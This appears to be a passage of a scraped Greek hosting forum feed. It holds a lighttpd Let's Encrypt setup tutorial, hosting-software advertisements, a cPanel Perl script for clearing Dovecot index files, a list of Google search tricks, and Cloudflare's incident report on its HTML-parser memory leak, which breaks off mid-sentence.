#your domain name dest="/etc/lighttpd/ssl/cyberciti.biz" #lighttpd ssl path root croot="/root/.acme.sh/${dom}" #acme.sh root path for your domain ### NO edit below ### sslfile="${dest}/ssl.pem" #lighttpd .pem file path certfile="${croot}/${dom}.cer" #lighttpd certficate file path keyfile="${croot}/${dom}.key" #lighttpd key file path echo "Running lighttpd cmd..." /bin/cat "${certfile}" "${keyfile}" > "${sslfile}" /bin/systemctl restart lighttpd Save and close the file. Set executable permissions:# chmod +x /root/.acme.sh/www.cyberciti.biz/hook.sh Above script will create a file named /etc/lighttpd/ssl/cyberciti.biz/ssl.pem (ssl.pem =cert+privkey). Type the following command to install certificate and restart the lighttpd web server:# acme.sh --installcert -d www.cyberciti.biz \ --capath /etc/lighttpd/ssl/cyberciti.biz/ca.cer \ --reloadcmd '/root/.acme.sh/www.cyberciti.biz/hook.sh' Sample outputs: Sun Mar 12 19:51:30 UTC 2017] Installing CA to:/etc/lighttpd/ssl/cyberciti.biz/ca.cer [Sun Mar 12 19:51:30 UTC 2017] Run reload cmd: /root/.acme.sh/www.cyberciti.biz/hook.sh Running lighttpd cmd... [Sun Mar 12 19:51:30 UTC 2017] Reload success Step 10 – Test it Verify that lighttpd running on port 443# netstat -tulpn | grep ':443'tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 379/lighttpd Step 11 – Open port 443 using ufw firewall Type the following ufw command to open port 443:# ufw allow proto tcp from any to 74.86.26.69 port 443 Type the following url in your browser:https://www.cyberciti.biz How do I renew a certificate? # acme.sh --renew -d www.cyberciti.biz How do I upgrade acme.sh client? # acme.sh --upgrade A note about cron job A cron job will try to do renewal a certificate for you too. This is installed by default as follows (no action required on your part): 33 0 * * * "/root/.acme.sh"/acme.sh --cron --home "/root/.acme.sh" > /dev/ https://www.cyberciti.biz/faq/how-to-configure-lighttpd-web-server-with-free-lets-encrypt-ssl-certificate-on-debian-or-ubuntu-linux/
  11. Hello Glencara,

    Welcome to designhost.gr.

    Feel free to browse our community accessing all sorts of information and getting to know our members.

    Do not hesitate to ask anything in our forums.

    designhost.gr

  12. Automated Kernel Security Updates Without Reboots Our easy, rebootless install with a single line of code will ensure you never miss another kernel security patch. Supports most popular Linux distributions: https://www.cloudlinux.com/all-products/product-overview/kernelcare
  13. Ultimate Security for Your Linux Web Server New from CloudLinux, the makers of the #1 OS in security and stability for hosted servers For CentOS, RHEL, and CloudLinux 6 & 7, with cPanel Coming soon: DirectAdmin, Plesk, ISPmanager, and servers without a control panel Imunify360 Keeps Your Web Servers Safe Your website is the lifeblood of your business. That’s why you need to protect your web server from digital attacks. Our automated security solution will protect your server from infections, maintain kernel updates, and keep you in the know with relevant information. Hands-off automation keeps your web server secure and keeps you in the know Imunify360 continuously protects your server, but you don’t always need to see the play-by-play. Use the centralized view to check in on the overall state of your server’s security with the option to view all security events. Powerful herd protection against the newest attacks We are constantly collecting and analyzing a massive amount of information about new attacks on a global scale. You benefit from these insights on the newest attacks from the moment you start. A security console right inside your hosting control panel, with 24x7 support Our software is integrated into your control panel (cPanel available now, DirectAdmin, Plesk, ISPmanager, & no panel coming soon), and runs on CentOS, RHEL, and CloudLinux 6 & 7 servers. Our expert staff is available 24/7/365 to answer questions and address any issues you have. https://imunify360.com/
  14. What is CloudLinux OS? CloudLinux OS is the leading platform for multitenancy. It improves server stability, density, and security by isolating each tenant and giving them allocated server resources. This creates an environment that feels more like a virtual server than a shared hosting account. By doing so, CloudLinux OS reduces operating costs and churn rates, and increases profitability. CloudLinux OS is designed for shared hosting providers. It isolates each customer into a separate “Lightweight Virtualized Environment” (LVE), which partitions, allocates, and limits server resources, like memory, CPU, and connections, for each tenant. This ensures that tenants cannot jeopardize the stability of your servers, causing all sites to slow down or even come to a halt. CloudLinux OS also “cages” tenants from one another to avoid security breaches. This way, unstable scripts or malware are not able to sprawl across your customer sites, causing severe harm. Results you can expect We work with thousands of hosting companies, and we see improvements in server performance, utilization, and margins across all of them! https://www.cloudlinux.com/all-products/product-overview/cloudlinuxos
  15. Σημερα ειχα ενα θεμα με WebMail όπου όλα τα αρχεία είχαν σωστά perms / ownership αλλά σε WebMail ο χρηστης δεν εβλεπε πια τα email του παρά μονο: "mail server closed the connection unexpectedly" Το περίεργο αλλά και θετικό ήταν πως δεν είχε σχέση με την IP ανα session, ούτε με άλλο email account ακόμη και στο ίδιο Package ( σε addon domain ) Παντα μιλάμε για cPanel box Την λύση την έδωσαν οι ίδιοι με ενα απο τα δικά τους scripts /scripts/remove_dovecot_index_files --user {user} --verbose ενδιαφερον fix [*] (1/1) Processing cPanel user: '{user}' … Unlinking '/home/{user}/mail/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index.log.2' … Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index.cache' … Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index' … Unlinking '/home/{user}/mail/{domain}/{user}/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/.Sent/dovecot.index.cache' … Unlinking '/home/{user}/mail/{domain}/{user}/.Sent/dovecot.index' … Unlinking '/home/{user}/mail/{domain}/{user}/.Sent/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/.Drafts/dovecot.index.cache' … Unlinking '/home/{user}/mail/{domain}/{user}/.Drafts/dovecot.index' … Unlinking '/home/{user}/mail/{domain}/{user}/.Drafts/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/.Trash/dovecot.index.cache' … Unlinking '/home/{user}/mail/{domain}/{user}/.Trash/dovecot.index' … Unlinking '/home/{user}/mail/{domain}/{user}/.Trash/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/.spam/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/.Junk/dovecot.index.log' … Unlinking '/home/{user}/mail/{domain}/{user}/.Archive/dovecot.index.log' … [+] '{user}' processed. To script το βρηκα και εδω http://www.batangrande.com/fotos/sym/root/scripts/remove_dovecot_index_files #!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/remove_dovecot_index_files # Copyright 2015 cPanel, Inc. # All rights Reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package scripts::remove_dovecot_index_files; use strict; use File::Find (); use File::Spec (); use Getopt::Long (); use Cpanel::Config::LoadCpConf (); use Cpanel::PwCache (); use Cpanel::Reseller (); use Cpanel::Config::Users (); use Cpanel::Config::LoadUserOwners (); use Cpanel::AccessIds::ReducedPrivileges (); exit run(@ARGV) unless caller(); my $verbose = 0; sub run { my @cmdline_args = @_; return usage(1) if !@cmdline_args; unless ( $> == 0 && $< == 0 ) { return usage( 1, "[!] This program can only be run by root!\n" ); } my $opts = {}; Getopt::Long::GetOptionsFromArray( \@cmdline_args, 'all' => \$opts->{'all'}, 'reseller=s@' => \$opts->{'reseller'}, 'user=s@' => \$opts->{'user'}, 'verbose' => \$verbose, 'help|h' => \$opts->{'help'}, ); return usage(0) if $opts->{'help'}; my $cpconf_ref = Cpanel::Config::LoadCpConf::loadcpconf(); if ( $cpconf_ref->{'mailserver'} ne 'dovecot' ) { return usage( 1, "[!] The configured mailserver is not Dovecot. Action aborted.\n" ); } return process_all_users_on_server() if $opts->{'all'}; process_reseller( $opts->{'reseller'} ) if $opts->{'reseller'} && scalar @{ $opts->{'reseller'} }; process_cpanel_user( $opts->{'user'} ) if $opts->{'user'} && scalar @{ $opts->{'user'} }; return 0; } sub process_cpanel_user { my $cpusers_to_process = shift; my ( $index, $total ) = ( 1, scalar @{$cpusers_to_process} ); foreach my $cpuser ( @{$cpusers_to_process} ) { print "[*] ($index/$total) Processing cPanel user: '$cpuser' …\n"; $index++; my $homedir = Cpanel::PwCache::gethomedir($cpuser); my $maildir = File::Spec->catfile( $homedir, 'mail' ); if ( !-d $maildir ) { print "[!] User's maildir was not found: $maildir - $!\n"; next; } my $maxdepth = File::Spec->splitdir($maildir) + 4; my $purge_index_files_codref = sub { File::Find::find( { 'wanted' => sub { # Dovecot index files are in "$homedir/mail/domain.tld/emailuser/<dirname>". # So we limit the depth here to what was determined above. return if File::Spec->splitdir($File::Find::name) > $maxdepth; # Remove files that match: # dovecot.index # dovecot.index.cache # dovecot.index.log # dovecot.index.log.\d+ (rotated log files) return if $_ !~ m/^dovecot\.index(\.cache|\.log(\.\d+)?)?$/; print "Unlinking '$File::Find::name' …\n" if $verbose; if ( -e $File::Find::name && -f $File::Find::name ) { unlink $File::Find::name or print "Failed to unlink '$File::Find::name': $!\n"; } }, 'no_chdir' => 0, # default, but setting to be explicit about the usage. 'follow_skip' => 2, # ignore any duplicate files and directories }, $maildir ); }; eval { Cpanel::AccessIds::ReducedPrivileges::call_as_user( $purge_index_files_codref, $cpuser ) }; print "[+] '$cpuser' processed.\n"; } return; } sub process_reseller { my $resellers_to_process = shift; foreach my $reseller ( @{$resellers_to_process} ) { print "[*] Processing Reseller: '$reseller' …\n"; if ( !Cpanel::Reseller::isreseller($reseller) ) { print "[!] '$reseller' is not reseller.\n\n"; next; } my $owners_hr = Cpanel::Config::LoadUserOwners::loadtrueuserowners( {} ); if ( !( $owners_hr->{$reseller} && 'ARRAY' eq ref $owners_hr->{$reseller} ) ) { print "[!] Failed to fetch list of accounts owned by reseller, '$reseller'.\n\n"; return; } print "\n"; process_cpanel_user( $owners_hr->{$reseller} ); print "\n"; } return; } sub process_all_users_on_server { my $cpusers = Cpanel::Config::Users::getcpusers(); if ( !( $cpusers && 'ARRAY' eq ref $cpusers ) ) { print "[!] Failed to fetch list of cPanel accounts on server.\n"; return; } print "[*] Processing all cPanel users on the server …\n\n"; process_cpanel_user($cpusers); print "\n[+] Finished processing all cPanel users on the server.\n"; return 0; } sub usage { my ( $retval, $msg ) = @_; my $fh = $retval ? \*STDERR : \*STDOUT; if ( !defined $msg ) { $msg = <<USAGE; $0 Utility to remove Dovecot index files. Available options: --user [cPanel username] Remove Dovecot index files from all email accounts setup under the specified cPanel user. Can be specified more than once, to process multiple users at once. --reseller [reseller username] Remove Dovecot index files from all email accounts setup under all the cPanel accounts owned by the specified Reseller. Can be specified more than once, to process multiple resellers at once. --all Remove Dovecot index files from all email accounts setup on the server. --verbose Prints the full paths of the files being removed. --help Prints this help text. USAGE } print {$fh} $msg; return $retval; } 1;
  16. Hello steve,

    Welcome to designhost.gr.

    Feel free to browse our community accessing all sorts of information and getting to know our members.

    Do not hesitate to ask anything in our forums.

    designhost.gr

  17. New Google Tricks For Fun: This is no doubt that everyone wants to know Google secret tricks, the tricks that not many people are aware of but still some people do remember those tricks when it comes to necessity, suppose you are a traveller and always want to keep yourself up to date then you will always useGoogle Flight Status like feature. Cool tricks on google had its presence since long-time now it’s time to dig out more. 40 Hidden Cool New Google Tricks For Fun This is no doubt that Google always tries to hide some features from their users so that the users gets curious and does several types of research on those hidden new google tricks. All google tricks are here, to help you we have researched on Top 40 New Google cool Tricks which are very useful, many of them are for fun, if you want to impress your friends in an extraordinary way then use these tricks share with them and do more fun on cool google tricks. Previously we have shared an article on Google hidden games which is also a part of this Top 40 Cool Hidden New Google Tricks! but they are specifically made for users who want to play games on Google. Check out the top below tricks for google! Below 40 Hidden Cool New Google Search Tricks For Fun 1. Google Pacman Best New Google Tricks 2017 For Fun- PacMan The first and will always be in the top is Pacman, one of the google game tricks! yes, Pacman is very popular in the world of gaming since 2010, Pacman Game on Google was on PacMan Anniversary as Google Doodles on May 21, 2010. and Google also made the game officially available for the game lovers on the Google front page which mean’s if your search only for “PacMan” on Google you will be able to see the game with Click to Play option from where you can play Pacman. The game is developed by Namco in the May 1980s when people are yet unfamiliar with the internet and at that time there was a Pacman machine people used to put the coin to play again after the dead of Pacman. now each year on Birthday anniversary of Pacman Google used to embed Doggles in the front Google page! Enjoy the game and more tricks on google. 2. Do a Barrel Roll Google Tricks Best New Google Tricks 2017 For Fun- Do a Barrel Roll Do a Barrel Roll basically determines for aircraft that how a pilot rotates 360° from its axis aerobatic maneuver, the trick is also applied on Google page when you search for Do a Barrel Roll on google you will see the changes, you will have fun for sure, this trick was very old, on 2011 Google introduced some of these tricks on Easter Egg. There are more New Google tricks below you can findout! 3. Google Gravity New Google tricks is here, the most famous! you can use this trick if you want everything should work like earth’s gravity! yes, the gravity we are feeling currently as a living being you will also face the same gravity on Google, everything will fell down. How Can You Do it? Before you move to Google search bar, you need to do some settings on your browser, visit account preferences page and disable the Google’s Instant results, now from address bar type www.google.com and on the search box type Google Gravity and without hitting enter button just move your mouse cursor on the suggestion of Google Gravity you will find ‘I’m feeling lucky’ option click on that. 4. askew Askew – New Google Tricks: 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 Another yet for fun! yes, on this trick you will see all the Google search results on tilt way and if you show your friend who is unaware of this trick then he might think that the monitor has got some serious trouble, use a computer for the best prank! Just type on search box ‘Tilt’ or ‘askew’ and enjoy. 5. Zerg Rush Zerg Rush – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 The one interesting search you will encounter with is Zerg Rush, I loved it the most! because when you search this you will find the results are getting destroyed by the Zerg Rush, basically those O’s are the enemy of your search results and will try to kill all the results instantly you just need to win the race against them (Them means they O are in huge numbers) you just need to kill those Zerg Rush before they will all the results. It is very hard to race against them but you will see the final results are GG which means good Game and you will lose the race against Zerg Rush. Search more New Google Tricks below! 6. Atari Breakout Atari Breakout – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 On google type ‘Atari Breakout‘ and click on ‘Images’ tab wait for it you will see the results while playing game, this is only for normal gamer who want to spend time playing common game but yet this is one of the popular game when it was launched and now also people used to play this game searching that word ‘Atari Breakout’. Kill all the image results to win the match. Search for atari breakout I’m feeling lucky. 7. Chuck Norris Chuck Norris on previous days was very much popular, people used to search it to know what exactly it is. The result was weird! when someone search for “Find Chuck Norris” then google was with a prompt says “Google won’t search for Chuck Norris because it knows you don’t find Chuck Norris, he finds you.” If you want to know who is Chuck Norris then you will find him as a Martial Artist also he has played a role in The Expandables 2. Now he is a Film Producer and screenwriter. Find Chuck Norris other google tricks and find chuck Norris I’m feeling lucky. Updated Find Chuck Norris: Now when you search for him you will encounter with “Chuck Norris invented Chuck Norris jokes, but he never submitted any because Chuck Norris submits to no one.” Quite confusing? yep yet interesting search! more below! 8. Google Translator Beatbox Yes you heard it right, Google translator Beatbox, if you want to do some experiments with your simple life then you just need some boost enjoyments using this Google Trick, this trick basically a music composer in which Google translator speaks out the written words. And you can enter any letter or word the translator will speakout. let’s try some fun, copy these and paste to the google translator box and then click on Listen. “ 9. Do the Harlem Shake What basically Do the Harlem Shake Google Trick Prank is? this is based onEaster Egg in which a group of pranksters at YouTube have honored the meme by Google YouTube as fun on little Easter Egg with a shake, when you search for ‘Do the Harlem Shake‘ on www.youtube.com then after 15 sec the whole screen will start dancing or we can say the screen will starting shaking including the videos thumbnails and the sidebar navigation. This is an awesome fun trick Google has made for its fan! Anyway, this is not the only meme-based Easter Egg, when Gangnam Style hit 1 Billion views the YouTube set up a dancing view counter. 10. The game Dinosaur One of the most addictive game ever on Google Chrome and on Google. If you are good at playing games then score high than others visit here to start your gaming experience and also you will find players already scored around 35,000 to 40,000 score, if you think you can beat them then good luck with you! this game can be found from Google Search, just type The Game Dinosaur and within the suggestion click “I’m feeling lucky”.. start the game! 11. Conway’s game of life This tricky game was an old one but still if you search for Conway’s Game of Lifethen it will allow continuing browsing to the end of the Google search, basically, behind this game, there is a British Mathematician John Conway who created the theory with a combination of Game of Life. 12. The Loch Ness Monster On Google Map search just type “Loch Ness” which will show you in a doll street view, basically for those who has much time to spend on searching these and getting information of how this things works, use the comment box how you feel working on it. 13. com/sky com/sky – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 This Google trick will help you to understand the closer look on our Galaxy world, you can zoom in and zoom out to see different types of comets. See your own Earth and other plants. Just search for com/sky and with the first results you can get the website or you can directly visit here. 14. Buildwithchrome.com Are you interested on creativity? if yes then this google trick in 2017 getting much popular for kids when they want to create their own world on different dimension! yes, just google or direct visit buildwithchrome.com and you will find small pieces with endless Lego. Construct your own world using the unlimited Lego, The best part is you will learn and understand the creativity format on your brain. Yes it’s an educational and playing concept. Keep creating and learning until you get bored in this Lego World! 15. Google “once in a blue moon”. Have you ever seen Blue Moon? search for the term “once in a blue moon” in google and you will see the results as calculation, what exactly it is? The moon turns blue after volcanic eruption occurs and thus the dust particles float in the atmosphere which turns into the diffract blue light, you now will understand why Moon at the time of sunset looks Red. 16. Google Mirror Google Mirror – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 Now another interesting Google trick, Google Mirror means whatever you will search on Google Mirror you will find those in backwards written or can be called as a mirror of everything. Have you seen an Ambulance? how does it look at the front bonnet? it is written in a mirror way. Just search on Google ‘Google Mirror’ and do not click enter, just after typing click on ‘I’m feeling lucky’ It will take you to the Google Mirror! Enjoy. 17. Type <blink> in the search box. Just search <blink> on Google and see what happens! You will say that Google has so many things to do. blink blink blink. 18. Google Guitar Google Guitar – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 As we are saying from the beginning that how Google is making their Search Engine more convenient in every way, like now you can play or make music using Google Guitar, just search for Google Guitar with same ‘I’m feeling Lucky’ and you are redirected to the Google Guitar page where you will be able to play Guitar Tunes, sing and play! Enjoy More New Google Tricks below! 19. You can use Google as a timer Google as a timer – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 It is Awesome isn’t? just search for ‘Set Timer‘ on Google you will be able to set the timer instantly, you really don’t need any additional software to use this timer feature. The only thing you need is Internet, Search ‘Set Timer’ and after you manually set the time you will hear the constant beep sound which means the timer has completed. Works exactly as Stopwatch! Enjoy More New Google Tricks for 2017. 20. Get Direct Forecast of Any City Get Direct Forecast of Any City – New Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 If you are living in San Franciso and want to know the weather condition of that location then you just need to type on Google as “San Francisco Forecast” and you will get your result as how much temperature the city is facing including upcoming days weather forecast as Humidity and wind speed. New Google Tricks For Information is here 2017. 21. Get Information On Particular Site On Google Search for “site:gadgetsay.com” you will find several links which only related to gadgetsay, so if you want to get information on any particular information such as Skype Alternatives then you will get like this, “site:gadgetsay.com skype alternatives” and you will get information only related to Skype Alternatives. 22. At Restaurant Calculate Tip Restaurant Tip Calculator – Google Tricks 40 Hidden Cool Google Search Tricks For Fun – Updated 2017 This trick is one of the “Must Remember” Google trick, yes if you are at a restaurant having dinner what will be the tip if your total dinner cost $500? just search on Google “What is the tip for $500” it will show you the tip price, but you can even adjust the percentage of tip that restaurant is allowing also can set the number of people having dinner. Set as per you like and send some food to Gadgetsay! Enjoy. 23. You can check your flight status. If you are a traveller and want to keep always upto date then use Google Search trick to know your flight status, just on Google Search box search “Flight Status JAL Flight 707” You can use your flight number. 24. Search Movies Showtime on Your Location On Google search box just type “Movie Times at San Francisco” and you will get the bunch of movies show going on San Francisco, it will help you to know which show is going or will start on which theatre. 25. Search for “flip a coin” If you are on a quiz or on at bet with someone and having no bucks then use Google Search for that, just from your smartphone or from manually type “flip a coin” or from the mic itself on smartphone you can say that and it will give you the flip of coin which comes either Heads or Tails. 26. Google General Knowledge And Fun Facts! The most interesting and educational trick ever on Google, yes if you want to boost your general knowledge then this is the best trick for you! just search for “Fun Facts” or “I’m feeling Curious” you will get questions with answers, all are random, you can even click on Ask another question frequently! 27. Listening Animal Sounds On Google If you want to know how animal sounds then you just need to type Animal Sounds on Google Search box and it will give you bunch of animals with their vocal sound! 28. Right Now What People Are Searching Across The World? If you want to know what people are searching around the world right now? then you are on correct place, just go with the link here and see how many people are currently searching for particular or several terms! Check here. 29. Google in 1998 Just type “Google in 1998” in Google Search Box and you will see the results how Google looks like in 1998. it’s a huge transformation between these years. 30. Get direct download link of any Files Get direct download link of an M3p or video or any movie link, we have already shared an article on How to get the direct download link of any file from Google Search, just type in search box “intitle:index.of?mp3 Your song name here” you can change the extension with mp4, 3gp or Avi format. Enjoy ;). 31. Google Is Your Dictionary If you don’t have a dictionary with you then no worries, just Google your word with Define and you will get the meaning of the word you searched for, for example, you want to know the meaning of congregation then on Google type “Define congregation” and you will get the definition of it. 32. Get Alerts On Any Topic You Want To Know If you want to get alerts on any topic such as Trump Speech then just visit hereand type your alerts, make sure you are logged into Google and you will start receiving alerts on every new article on that topic. 33. Search any file type format in Google If you are searching for a specific file type then search keyword like “Filetype:Yourfiletype” or “filetype:.exe” and you will get bunch of files with direct downloading options. 34. Dig More Into A Website Search Info:Website and you will get information or history of any popular website, such as info:theverge.com and you will get information about the site even from Wikipedia. 35. Find Release Date Of Movies In Your Country To find any movie release date then just type the movie name and the release date on Google search box you will see the first release date on big format. “(movie name) Release date” 36. Get any product as per the range you want. Find Products on Google from a given specific price range example; Search 2017 Phones $100..$150 and you will get lists of smartphones which is between 100 to 150 dollar. See result. 37. Are are searching Google in .com extension but getting redirect to .uk or .nl? In a Different Country, Avoid Country Specific Redirects On Google. Go ToGoogle.Com/Ncr and it will not redirect to any country extension and will help you to get US based .com results. 38. Need Calculator? Here you have it. You really do not always need to open any application just to calculate numbers, just open www.google.com and type calculator and all problem solved. 39. Get Recently Published article with alteration on Google Search. If you are searching for a topic and you found several articles on that but didn’t got the recently published articles then you need to use Google Tools, click on Tools after Google Search Box and then you can see several options like Country, Timing and Results type, select Any Time and from there select Past Hour or Past 24 Hours based as per you want. Enjoy! 40. Find twitter profile on Google Just type @ and then any keyword for example; @Gadgetsay, you will find Twitter or Flipboard profile. Conclusion So these are only the top 40 New Google Tricks, if you have more with you then don’t hesitate to add in the comment section so that others can get your tips too! All these New Google Tricks are old ofcourse but still some of them are new and still in use, like Resturant waiter Tip calculation and other regular calculator and the currency exchange rate real-time information, some of these are searched regularly. https://www.gadgetsay.com/hidden-new-google-tricks-search-cool/
  18. https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html
  19. Incident report on memory leak caused by Cloudflare parser bug Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines. For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug. We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response. Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses. Having a global team meant that, at 12 hour intervals, work was handed over between offices enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months. The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes. The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence. The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests). We are grateful that it was found by one of the world’s top security research teams and reported to us. This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service. Parsing and modifying HTML on the fly Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can insert the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable AMP, and more by modifying the HTML of a page. To modify the page, we need to read and parse the HTML to find elements that need changing. Since the very early days of Cloudflare, we’ve used a parser written using Ragel. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs. About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it. This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain. We first used this new parser for the Automatic HTTP Rewrites feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html. Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter. For the avoidance of doubt: the bug is not in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel. It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering which enabled the leakage even though there were no problems in cf-html itself. Once we knew that the bug was being caused by the activation of cf-html (but before we knew why) we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding feature flag, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, thus disabling it quickly stopped almost all memory leaks. Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing. We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses. Root cause of the bug The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control of the movement of those pointers. The underlying bug occurs because of a pointer error. /* generated code */ if ( ++p == pe ) goto _test_eof; The root cause of the bug was that reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using >= instead of == jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly. The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun. Here’s a piece of Ragel code used to consume an attribute in an HTML <script> tag. The first line says that it should attempt to find zero of more unquoted_attr_char followed by (that’s the :>> concatenation operator) whitespace, forward slash or then > signifying the end of the tag. script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>')) >{ ddctx("script consume_attr"); } @{ fhold; fgoto script_tag_parse; } $lerr{ dd("script consume_attr failed"); fgoto script_consume_attr; }; If an attribute is well-formed, then the Ragel parser moves to the code inside the @{ } block. If the attribute fails to parse (which is the start of the bug we are discussing today) then the $lerr{ } block is used. For example, in certain circumstances (detailed below) if the web page ended with a broken HTML tag like this: <script type= the $lerr{ } block would get used and the buffer would be overrun. In this case the $lerr does dd(“script consume_attr failed”); (that’s a debug logging statement that is a nop in production) and then does fgoto script_consume_attr; (the state transitions to script_consume_attr to parse the next attribute). From our statistics it appears that such broken tags at the end of the HTML occur on about 0.06% of websites. If you have a keen eye you may have noticed that the @{ } transition also did a fgoto but right before it did fhold and the $lerr{ } block did not. It’s the missing fhold that resulted in the memory leakage. Internally, the generated C code has a pointer named p that is pointing to the character being examined in the HTML document. fhold is equivalent to p-- and is essential because when the error condition occurs p will be pointing to the character that caused the script_consume_attr to fail. And it’s doubly important because if this error condition occurs at the end of the buffer containing the HTML document then p will be after the end of the document (p will be pe + 1 internally) and a subsequent check that the end of the buffer has been reached will fail and p will run outside the buffer. Adding an fhold to the error handler fixes the problem. Why now That explains how the pointer could run past the end of the buffer, but not why the problem suddenly manifested itself. After all, this code had been in production and stable for years. Returning to the script_consume_attr definition above: script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>')) >{ ddctx("script consume_attr"); } @{ fhold; fgoto script_tag_parse; } $lerr{ dd("script consume_attr failed"); fgoto script_consume_attr; }; What happens when the parser runs out of characters to parse while consuming an attribute differs whether the buffer currently being parsed is the last buffer or not. If it’s not the last buffer, then there’s no need to use $lerr as the parser doesn’t know whether an error has occurred or not as the rest of the attribute may be in the next buffer. But if this is the last buffer, then the $lerr is executed. Here’s how the code ends up skipping over the end-of-file and running through memory. The entry point to the parsing function is ngx_http_email_parse_email (the name is historical, it does much more than email parsing). ngx_int_t ngx_http_email_parse_email(ngx_http_request_t *r, ngx_http_email_ctx_t *ctx) { u_char *p = ctx->pos; u_char *pe = ctx->buf->last; u_char *eof = ctx->buf->last_buf ? pe : NULL; You can see that p points to the first character in the buffer, pe to the character after the end of the buffer and eof is set to pe if this is the last buffer in the chain (indicated by the last_buf boolean), otherwise it is NULL. When the old and new parsers are both present during request handling a buffer such as this will be passed to the function above: (gdb) p *in->buf $8 = { pos = 0x558a2f58be30 "<script type=\"", last = 0x558a2f58be3e "", [...] last_buf = 1, [...] } Here there is data and last_buf is 1. When the new parser is not present the final buffer that contains data looks like this: (gdb) p *in->buf $6 = { pos = 0x558a238e94f7 "<script type=\"", last = 0x558a238e9504 "", [...] last_buf = 0, [...] } A final empty buffer (pos and last both NULL and last_buf = 1) will follow that buffer but ngx_http_email_parse_email is not invoked if the buffer is empty. So, in the case where only the old parser is present, the final buffer that contains data has last_buf set to 0. That means that eof will be NULL. Now when trying to handle script_consume_attr with an unfinished tag at the end of the buffer the $lerr will not be executed because the parser believes (because of last_buf) that there may be more data coming. The situation is different when both parsers are present. last_buf is 1, eof is set to pe and the $lerr code runs. Here’s the generated code for it: /* #line 877 "ngx_http_email_filter_parser.rl" */ { dd("script consume_attr failed"); {goto st1266;} } goto st0; [...] st1266: if ( ++p == pe ) goto _test_eof1266; The parser runs out of characters while trying to perform script_consume_attr and p will be pe when that happens. Because there’s no fhold (that would have done p--) 